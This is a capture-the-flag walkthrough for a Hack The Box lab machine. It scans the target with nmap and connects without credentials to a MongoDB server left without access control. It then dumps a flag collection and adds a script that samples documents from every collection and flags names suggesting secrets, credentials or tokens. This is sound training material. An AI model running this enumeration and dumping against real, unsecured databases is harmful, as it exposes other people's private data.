The aim of this walkthrough is to help with the Mongod machine on the Hack The Box website. Please note that no flags are provided here, and that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a shell variable (only available in the current shell session) containing the target host's IP address. Once set, we can refer to it by prepending a $ to the variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
You can use the unset command to remove it once you no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: How many TCP ports are open on the machine?
Use nmap to scan all TCP ports (-p-) on the target machine. A full port scan takes a few minutes, as the timing at the end of the output shows.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap -p- $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 20:50 BST
Nmap scan report for 10.129.228.30
Host is up (0.016s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
27017/tcp open mongod
Nmap done: 1 IP address (1 host up) scanned in 276.32 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
2
TASK 2
Question: Which service is running on port 27017 of the remote host?
Run nmap against the port found above with the -sV option set, so that it probes the service and reports its version.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap -sV -p 27017 $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 20:57 BST
Nmap scan report for 10.129.228.30
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
27017/tcp open mongodb MongoDB 3.6.8
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.55 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
mongodb 3.6.8
TASK 3
Question: What type of database is MongoDB? (Choose: SQL or NoSQL)
Hello wikipedia… :)
nosql
TASK 4
Question: What is the command name for the Mongo shell that is installed with the mongodb-clients package?
Just like before, use the internet. The mongodb-clients package ships the legacy MongoDB shell, and its command is mongo. The Pwnbox has the newer mongosh shell installed instead, which is what we use to connect in the following tasks; it talks to this MongoDB 3.6 server without any issue.
mongo
TASK 5
Question: What is the command used for listing all the databases present on the MongoDB server? (No need to include a trailing ;)
First let's connect to the MongoDB server on port 27017. Then use help to get a better idea of the available commands.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $mongosh --host $rhost --port 27017
Current Mongosh Log ID: 6454116baf46ee7fd101f1a3
Connecting to: mongodb://10.129.228.30:27017/?directConnection=true&appName=mongosh+1.8.0
Using MongoDB: 3.6.8
Using Mongosh: 1.8.0
For mongosh info see: https://docs.mongodb.com/mongodb-shell/
To help improve our products, anonymous usage data is collected and sent to MongoDB periodically (https://www.mongodb.com/legal/privacy-policy).
You can opt-out by running the disableTelemetry() command.
------
The server generated these startup warnings when booting
2023-05-04T19:47:17.293+0000:
2023-05-04T19:47:17.293+0000: ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2023-05-04T19:47:17.293+0000: ** See http://dochub.mongodb.org/core/prodnotes-filesystem
2023-05-04T19:47:20.674+0000:
2023-05-04T19:47:20.674+0000: ** WARNING: Access control is not enabled for the database.
2023-05-04T19:47:20.674+0000: ** Read and write access to data and configuration is unrestricted.
2023-05-04T19:47:20.674+0000:
------
test> help
Shell Help:
use Set current database
show 'show databases'/'show dbs': Print a list of all available databases.
'show collections'/'show tables': Print a list of all collections for current database.
'show profile': Prints system.profile information.
'show users': Print a list of all users for current database.
'show roles': Print a list of all roles for current database.
'show log <type>': log for current connection, if type is not set uses 'global'
'show logs': Print all logs.
exit Quit the MongoDB shell with exit/exit()/.exit
quit Quit the MongoDB shell with quit/quit()
Mongo Create a new connection and return the Mongo object. Usage: new Mongo(URI, options [optional])
connect Create a new connection and return the Database object. Usage: connect(URI, username [optional], password [optional])
it result of the last line evaluated; use to further iterate
version Shell version
load Loads and runs a JavaScript file into the current shell environment
enableTelemetry Enables collection of anonymous usage data to improve the mongosh CLI
disableTelemetry Disables collection of anonymous usage data to improve the mongosh CLI
passwordPrompt Prompts the user for a password
sleep Sleep for the specified number of milliseconds
print Prints the contents of an object to the output
printjson Alias for print()
convertShardKeyToHashed Returns the hashed value for the input using the same hashing function as a hashed index.
cls Clears the screen like console.clear()
isInteractive Returns whether the shell will enter or has entered interactive mode
For more information on usage: https://docs.mongodb.com/manual/reference/method
test>
As we can see in the line - 'show databases'/'show dbs': Print a list of all available databases - either show databases or show dbs should do the trick here. Before running it, note the server's own startup warning in the banner above: access control is not enabled, so read and write access to data and configuration is unrestricted. We connected without a username or password and were dropped straight into a working shell; that misconfiguration is what the whole box turns on. Let's try it.
test> show dbs
admin 32.00 KiB
config 72.00 KiB
local 72.00 KiB
sensitive_information 32.00 KiB
users 32.00 KiB
test>
show dbs
TASK 6
Question: What is the command used for listing out the collections in a database? (No need to include a trailing ;)
The help output from the previous task has the answer here too, namely the line - 'show collections'/'show tables': Print a list of all collections for current database.
Because it only lists the current database, switch between databases with the use command and run show collections in each one. The flag collection in the sensitive_information database looks especially interesting.
test> use admin
switched to db admin
admin> show collections
system.version
admin> use config
switched to db config
config> show collections
system.sessions
config> use local
switched to db local
local> show collections
startup_log
local> use sensitive_information
switched to db sensitive_information
sensitive_information> show collections
flag
sensitive_information> use users
switched to db users
users> show collections
ecommerceWebapp
users>
show collections
TASK 7
Question: What is the command used for dumping the content of all the documents within the collection named flag in a format that is easy to read?
The internet is such a reliable helper, and we already know from the previous task that the flag collection lives in the sensitive_information database. Switch to it and dump its contents with db.flag.find().pretty(). Oh, great, that also solves the last task...
users> use sensitive_information
switched to db sensitive_information
sensitive_information> show collections
flag
sensitive_information> db.flag.find().pretty()
[
{
_id: ObjectId("630e3dbcb82540ebbd1748c5"),
flag: '<flag>'
}
]
sensitive_information>
db.flag.find().pretty()
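Tasks 5 to 7 are the same three steps (list databases, list collections, dump documents) applied by hand to every database. The script below is an added example and not part of the original walkthrough: it does the whole walk in one go against the mongosh shell API (Mongo.getDBNames, DB.getCollectionNames, Collection.find), returns a sample of documents from every collection, and flags databases or collections whose names hint at something worth a closer look. Run it from the Pwnbox with mongosh --host "$rhost" --port 27017 --quiet --file enum.js; the enum.js file name, the SAMPLE_LIMIT value and the INTERESTING name pattern are my own choices. If access control were enabled on the server, the listDatabases call behind getDBNames would fail with "not authorized", and the script reports that instead of crashing.

```javascript
// Added example (not from the original walkthrough): enumerate every database
// and collection reachable through a mongosh connection. `conn` is the object
// returned by db.getMongo() inside mongosh.
const SAMPLE_LIMIT = 5;   // assumption: documents fetched per collection
// assumption: name fragments that usually deserve a look first
const INTERESTING = /flag|secret|sensitive|cred|pass|token|key|user/i;

function enumerateServer(conn, limit = SAMPLE_LIMIT) {
  let dbNames;
  try {
    dbNames = conn.getDBNames();            // runs listDatabases on the server
  } catch (e) {
    // With access control enabled and no credentials, listDatabases fails with
    // "not authorized" (MongoDB error code 13). Report it and stop.
    return { accessControl: 'enabled', databases: {}, error: String(e) };
  }
  const databases = {};
  for (const dbName of dbNames) {
    const database = conn.getDB(dbName);
    databases[dbName] = {};
    for (const collName of database.getCollectionNames()) {
      const coll = database.getCollection(collName);
      databases[dbName][collName] = {
        interesting: INTERESTING.test(dbName) || INTERESTING.test(collName),
        sample: coll.find().limit(limit).toArray(),
      };
    }
  }
  return { accessControl: 'disabled', databases };
}

// Flatten the report to a sorted list of "db.collection" names that matched INTERESTING.
function interestingTargets(report) {
  const out = [];
  for (const [dbName, colls] of Object.entries(report.databases)) {
    for (const [collName, info] of Object.entries(colls)) {
      if (info.interesting) out.push(`${dbName}.${collName}`);
    }
  }
  return out.sort();
}

// Inside mongosh the global `db` is the current connection; under plain Node it
// is undefined, so the file can also be loaded as a library without side effects.
if (typeof db !== 'undefined') {
  const report = enumerateServer(db.getMongo());
  printjson(report);
  print('Collections worth a closer look: ' + interestingTargets(report).join(', '));
}
```

The accessControl field is the scripted version of the startup warning mongosh printed in Task 5: on this box it comes back disabled, which is why the whole enumeration works without a single credential. Keep SAMPLE_LIMIT small on a real engagement; dumping every document of every collection is rarely what you want before you know what is in there.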
SUBMIT FLAG
Question: Submit root flag
Already solved above. :)
flag
Make sure to terminate the target box before you continue with the next machine!